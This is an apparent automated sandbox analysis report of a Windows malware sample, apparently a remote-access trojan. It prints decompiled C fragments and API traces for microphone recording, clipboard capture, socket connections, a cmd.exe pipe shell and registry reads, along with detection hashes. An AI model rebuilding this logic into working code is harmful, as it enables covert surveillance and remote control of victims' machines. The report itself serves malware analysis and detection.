                                        Function 00413AED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00413AED() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x41c1f8 = _t2;
				return _t2;
			}




                                        0x00413b03
                                        0x00413b09
                                        0x00413b0e

                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                        • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetConsoleWindow$kernel32.dll
                                        • API String ID: 2574300362-100875112
                                        • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                        • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B615, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
				int _v8;
				int _v12;
				char* _t31;
				signed int _t36;
				signed int _t37;
				void* _t46;

				_v8 = 0;
				_t31 = 0x415664;
				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
					_t31 = malloc(_v8);
					_t36 = _v8;
					_t46 = _t31;
					_t37 = _t36 >> 2;
					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
				return _a4;
			}









                                        0x0040b62f
                                        0x0040b635
                                        0x0040b641
                                        0x0040b652
                                        0x0040b654
                                        0x0040b65b
                                        0x0040b65d
                                        0x0040b667
                                        0x0040b67a
                                        0x0040b67a
                                        0x0040b684
                                        0x0040b691

                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                        • malloc.MSVCRT ref: 0040B64B
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                        • String ID:
                                        • API String ID: 3506253819-0
                                        • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                        • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004028CD, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                        • String ID:
                                        • API String ID: 182292213-0
                                        • Opcode ID: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                        • Opcode Fuzzy Hash: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401181, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00401181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E0040180C(0x41b200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
				_t36 = _a4 << 5;
				_t16 = E0040180C(0x41b200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x41b1dc; // 0x2d82948
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x41b1dc; // 0x2d82948
				_t29 =  *0x41b1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x41b1dc; // 0x2d82948
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x41b1dc; // 0x2d82948
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x41b1dc; // 0x2d82948
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x41b1dc; // 0x2d82948
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x41b1dc; // 0x2d82948
				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
				_t22 =  *0x41b1dc; // 0x2d82948
				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
			}














                                        0x00401181
                                        0x00401196
                                        0x0040119d
                                        0x004011ab
                                        0x004011ae
                                        0x004011b5
                                        0x004011bb
                                        0x004011c3
                                        0x004011c6
                                        0x004011cb
                                        0x004011d1
                                        0x004011d5
                                        0x004011dd
                                        0x004011e1
                                        0x004011e7
                                        0x004011eb
                                        0x004011f1
                                        0x004011f5
                                        0x004011fb
                                        0x004011ff
                                        0x0040120d
                                        0x00401213
                                        0x0040122c

                                        APIs
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                        • waveInPrepareHeader.WINMM(02D82948,00000020,?,?,0040116A,00000000), ref: 0040120D
                                        • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                        • String ID:
                                        • API String ID: 1952094867-0
                                        • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                        • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B5A2, Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x415800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                        0x0040b5ae
                                        0x0040b5cb
                                        0x0040b601
                                        0x0040b602
                                        0x0040b5cd
                                        0x0040b5e2
                                        0x0040b5eb
                                        0x0040b5f4
                                        0x0040b5fb
                                        0x0040b5fb
                                        0x0040b60a
                                        0x0040b614

                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                        • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                        • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 4081865614-0
                                        • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                        • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D87E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0040D87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x41b889; // 0x0
				if(_t29 == 0) {
					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E00402B8A(_t9);
				}
				E004017DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                        0x0040d88e
                                        0x0040d896
                                        0x0040d89c
                                        0x0040d8a6
                                        0x0040d8b1
                                        0x0040d8b7
                                        0x0040e597
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                          • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                          • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                          • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                          • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                        • String ID:
                                        • API String ID: 187635395-0
                                        • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                        • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041358B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 384503197-0
                                        • Opcode ID: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                        • Opcode Fuzzy Hash: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004054E9, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                        • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                        • String ID:
                                        • API String ID: 3911305588-0
                                        • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                        • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DCD4, Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0040DCD4() {
				void* _t15;
				intOrPtr _t19;

				E0040AC8C();
				exit(0);
				while(1) {
					_t19 =  *0x41beb8; // 0x0
					if(_t19 == 0) {
						break;
					}
					Sleep(0x64);
				}
				E00408245();
				E004017DD(_t15 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                        0x0040dcd4
                                        0x0040dcdb
                                        0x0040dce3
                                        0x0040dce3
                                        0x0040dce9
                                        0x00000000
                                        0x00000000
                                        0x0040dced
                                        0x0040dced
                                        0x0040dcf5
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • exit.MSVCRT ref: 0040DCDB
                                        • Sleep.KERNEL32(00000064), ref: 0040DCED
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                        • String ID:
                                        • API String ID: 772260455-0
                                        • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                        • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D8C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                        • String ID: open
                                        • API String ID: 317973523-2758837156
                                        • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                        • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                        Uniqueness

                                        Uniqueness Score: -1.00%